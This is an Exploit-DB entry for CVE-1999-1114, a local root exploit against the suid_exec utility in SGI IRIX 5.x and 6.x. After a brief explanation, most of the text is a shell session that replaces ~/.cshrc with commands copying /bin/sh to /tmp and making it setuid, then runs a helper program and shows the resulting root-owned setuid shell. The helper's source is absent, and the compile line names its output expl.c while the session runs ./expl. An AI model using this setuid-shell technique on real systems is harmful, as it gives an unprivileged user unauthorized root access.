SGI IRIX <= 6.4 suid_exec Vulnerability

ID EDB-ID:19353
Type exploitdb
Reporter Yuri Volobuev
Modified 1996-12-02T00:00:00


SGI IRIX 6.4 suid_exec Vulnerability. CVE-1999-1114. Local exploit for irix platform


A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. 

% setenv | grep SHELL
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
% cat > expl.c
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*